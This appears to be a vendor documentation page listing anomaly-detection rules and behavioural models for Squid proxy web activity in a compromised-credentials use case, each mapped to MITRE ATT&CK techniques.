Product: Squid
Use-Case: Compromised Credentials
| Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
|---|---|---|---|---|
| 40 | 22 | 12 | 2 | 5 |
| Event Type | Rules | Models |
|---|---|---|
| web-activity-allowed | T1190 - Exploit Public Fasing Application ↳ A-WEB-Mime-Types-Org-F: First occurence of this mime type on this asset for organization ↳ A-WEB-Base64CommandUserAgent: User agent with encoded commands was detected from this web activity. ↳ A-WEB-Log4j-String-2: There was an attempt via web activity to exploit the CVE-2021-44228 vulnerability using known keywords on the asset. T1071 - Application Layer Protocol ↳ WEB-UUa-OS-F: First web activity using this operating system for this user ↳ WEB-GUa-OS-F: First web activity using this operating system for the peer group ↳ WEB-OUa-OS-F: First web activity using this operating system for the organization ↳ WEB-UUa-MobileBrowser-F: First activity using this mobile web browser/app for this user to a new domain ↳ WEB-OsUa-MobileBrowser-F: First activity using this mobile web browser for this mobile operating system ↳ WEB-UUa-Browser-F: First activity using this web browser for this user to a new domain ↳ WEB-GUa-Browser-F: First activity using this web browser for the peer group ↳ WEB-OUa-Browser-F: First activity using this web browser for the organization ↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed. ↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user ↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user ↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization ↳ WEB-UZ-F: First web activity for this user in this zone ↳ WEB-GZ-F: First web activity from this zone for the peer group ↳ WEB-OZ-F: First web activity from this zone for the organization ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity ↳ WEB-URank-F: First web activity to this low ranked web domain ↳ WEB-URank-A: Abnormal web activity to this low ranked web domain ↳ WEB-IP-COUNTRY-A: Abnormal direct access to an IP address belonging to an abnormal country for user to access ↳ A-WEB-HA-F: First web activity event on asset ↳ A-WEB-DC: Web activity event on a Domain Controller ↳ A-WEB-IP-Country-F: Asset has directly browsed to an IP address in a country never before accessed ↳ A-WEB-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access ↳ A-NET-HCountry-Outbound-WEB-F: First web connection to this country from asset ↳ A-NET-HCountry-Outbound-WEB-A: Abnormal web browsing communication country for asset ↳ A-NET-OCountry-Outbound-WEB-F: First web browsing connection to this country from organization ↳ A-NET-OCountry-Outbound-WEB-A: Abnormal web browsing connection country for the organization T1071.001 - Application Layer Protocol: Web Protocols ↳ WEB-UUa-OS-F: First web activity using this operating system for this user ↳ WEB-GUa-OS-F: First web activity using this operating system for the peer group ↳ WEB-OUa-OS-F: First web activity using this operating system for the organization ↳ WEB-UUa-MobileBrowser-F: First activity using this mobile web browser/app for this user to a new domain ↳ WEB-OsUa-MobileBrowser-F: First activity using this mobile web browser for this mobile operating system ↳ WEB-UUa-Browser-F: First activity using this web browser for this user to a new domain ↳ WEB-GUa-Browser-F: First activity using this web browser for the peer group ↳ WEB-OUa-Browser-F: First activity using this web browser for the organization ↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed. ↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user ↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user ↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization ↳ WEB-UZ-F: First web activity for this user in this zone ↳ WEB-GZ-F: First web activity from this zone for the peer group ↳ WEB-OZ-F: First web activity from this zone for the organization ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity ↳ WEB-URank-F: First web activity to this low ranked web domain ↳ WEB-URank-A: Abnormal web activity to this low ranked web domain ↳ WEB-IP-COUNTRY-A: Abnormal direct access to an IP address belonging to an abnormal country for user to access ↳ A-WEB-HA-F: First web activity event on asset ↳ A-WEB-DC: Web activity event on a Domain Controller ↳ A-WEB-IP-Country-F: Asset has directly browsed to an IP address in a country never before accessed ↳ A-WEB-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access ↳ A-NET-HCountry-Outbound-WEB-F: First web connection to this country from asset ↳ A-NET-HCountry-Outbound-WEB-A: Abnormal web browsing communication country for asset ↳ A-NET-OCountry-Outbound-WEB-F: First web browsing connection to this country from organization ↳ A-NET-OCountry-Outbound-WEB-A: Abnormal web browsing connection country for the organization T1102 - Web Service ↳ A-WEB-DC: Web activity event on a Domain Controller T1189 - Drive-by Compromise ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1204 - User Execution ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1204.001 - T1204.001 ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1566 - Phishing ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1566.002 - Phishing: Spearphishing Link ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1078 - Valid Accounts ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity T1568 - Dynamic Resolution ↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA T1568.002 - Dynamic Resolution: Domain Generation Algorithms ↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA |
• A-WEB-Mime-Types-Src: Web Activity MIME types for asset in organization • A-NET-OCountry-Outbound: Outbound country per organization • A-NET-HCountry-Outbound: Outbound country per asset • A-WEB-IP: IPs an asset has directly browsed to • A-WEB-HA: Web activity per Host • WEB-URank: Web activity to low ranked domains for the user • WEB-OZ: Network zones where users performs web activity in the organization • WEB-GZ: Network zones where users performs web activity in the peer group • WEB-UZ: Network zones where a user performs web activity from • WEB-UT-TOW: Web activity activity time for user • WEB-UD-ALERT: Top malicious web domain accessed by the user • WEB-UI-Reputation: Top ip addresses flagged by a reputation service that have been accessed by the user • WEB-UD-Reputation: Top web domain flagged by a reputation service that have been accessed by the user • WEB-OUa-Browser-New: Top web browsers being used in this organization • WEB-GUa-Browser-New: Top web browsers being used by peer group • WEB-UUa-Browser-New: Top web browsers being used by user • WEB-OsUa-MobileBrowser-New: Top mobile apps/web browsers being used in the organization for this type of device • WEB-UUa-MobileBrowser-New: Top mobile apps/web browsers being used by user • WEB-OUa-OS-New: Top operating systems being used to connect to the web for organization • WEB-GUa-OS-New: Top operating systems being used to connect to the web for peer group • WEB-UUa-OS-New: Top operating systems being used to connect to the web for user • WEB-UD-DGA: Top web domains per user that seem to be DGA generated during web activity |
| web-activity-denied | T1190 - Exploit Public Fasing Application ↳ A-WEB-Mime-Types-Org-F: First occurence of this mime type on this asset for organization ↳ A-WEB-Base64CommandUserAgent: User agent with encoded commands was detected from this web activity. ↳ A-WEB-Log4j-String-2: There was an attempt via web activity to exploit the CVE-2021-44228 vulnerability using known keywords on the asset. T1071 - Application Layer Protocol ↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed. ↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user ↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user ↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization ↳ WEB-UZ-F: First web activity for this user in this zone ↳ WEB-GZ-F: First web activity from this zone for the peer group ↳ WEB-OZ-F: First web activity from this zone for the organization ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity ↳ WEB-URank-F: First web activity to this low ranked web domain ↳ WEB-URank-A: Abnormal web activity to this low ranked web domain ↳ WEB-IPF-Country-F: User has failed trying to directly browse to an IP address belonging to a country never before accessed ↳ A-WEB-HA-F: First web activity event on asset ↳ A-WEB-DC: Web activity event on a Domain Controller ↳ A-WEBF-IP-Country-F: Asset failed to directly connect to an IP address in a country never before accessed ↳ A-WEBF-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access has failed ↳ A-NETF-HCountry-Outbound-WEB-F: First failed web browsing connection to this country from asset ↳ A-NETF-HCountry-Outbound-WEB-A: Web browsing connection to abnormal country for asset has failed T1071.001 - Application Layer Protocol: Web Protocols ↳ WEB-UD-Reputation-F: First access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UD-Reputation-A: Abnormal access to this web domain which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-F: First access to this internet IP address which has been identified as risky by a reputation feed. ↳ WEB-UI-Reputation-A: Abnormal access to this IP address which has been identified as risky by a reputation feed. ↳ WEB-UD-ALERT-A: Abnormal security alert accessing this malicious domain for user ↳ WEB-UD-ALERT-N: Common security alert on this malicious domain for user ↳ WEB-UT-TOW-A: Abnormal day for this user to access the web via the organization ↳ WEB-UZ-F: First web activity for this user in this zone ↳ WEB-GZ-F: First web activity from this zone for the peer group ↳ WEB-OZ-F: First web activity from this zone for the organization ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity ↳ WEB-URank-F: First web activity to this low ranked web domain ↳ WEB-URank-A: Abnormal web activity to this low ranked web domain ↳ WEB-IPF-Country-F: User has failed trying to directly browse to an IP address belonging to a country never before accessed ↳ A-WEB-HA-F: First web activity event on asset ↳ A-WEB-DC: Web activity event on a Domain Controller ↳ A-WEBF-IP-Country-F: Asset failed to directly connect to an IP address in a country never before accessed ↳ A-WEBF-IP-Country-A: Abnormal direct access to an IP address by the asset belonging to an abnormal country for the asset to access has failed ↳ A-NETF-HCountry-Outbound-WEB-F: First failed web browsing connection to this country from asset ↳ A-NETF-HCountry-Outbound-WEB-A: Web browsing connection to abnormal country for asset has failed T1102 - Web Service ↳ A-WEB-DC: Web activity event on a Domain Controller T1189 - Drive-by Compromise ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1204 - User Execution ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1204.001 - T1204.001 ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1566 - Phishing ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1566.002 - Phishing: Spearphishing Link ↳ WEB-URank-Binary: Executable download from first low ranked web domain T1078 - Valid Accounts ↳ WEB-ALERT-EXEC: Security violation by Executive in web activity T1568 - Dynamic Resolution ↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA T1568.002 - Dynamic Resolution: Domain Generation Algorithms ↳ WEB-UD-DGA-A: Abnormal access to this domain which has been identified as DGA |
• A-WEB-Mime-Types-Src: Web Activity MIME types for asset in organization • A-NET-HCountry-Outbound: Outbound country per asset • A-WEB-IP: IPs an asset has directly browsed to • A-WEB-HA: Web activity per Host • WEB-URank: Web activity to low ranked domains for the user • WEB-OZ: Network zones where users performs web activity in the organization • WEB-GZ: Network zones where users performs web activity in the peer group • WEB-UZ: Network zones where a user performs web activity from • WEB-UT-TOW: Web activity activity time for user • WEB-UD-ALERT: Top malicious web domain accessed by the user • WEB-UI-Reputation: Top ip addresses flagged by a reputation service that have been accessed by the user • WEB-UD-Reputation: Top web domain flagged by a reputation service that have been accessed by the user • WEB-UD-DGA: Top web domains per user that seem to be DGA generated during web activity |